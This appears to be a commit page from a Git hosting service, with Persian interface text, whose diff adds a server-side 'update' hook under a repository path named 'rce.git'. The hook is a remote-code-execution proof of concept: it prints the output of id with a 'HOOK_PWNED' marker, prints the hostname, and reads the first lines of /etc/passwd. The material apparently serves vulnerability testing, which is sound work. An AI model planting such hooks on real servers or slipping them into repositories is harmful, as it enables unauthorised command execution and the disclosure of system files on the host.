x 1 روز پیش
والد
کامیت
46006e94ae
1فایلهای تغییر یافته به همراه5 افزوده شده و 0 حذف شده
  1. 5 0
      nested/rce.git/hooks/update

+ 5 - 0
nested/rce.git/hooks/update

@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "HOOK_PWNED:$(id)" >&2
+echo "HOST:$(hostname)" >&2
+cat /etc/passwd | head -5 >&2
+exit 0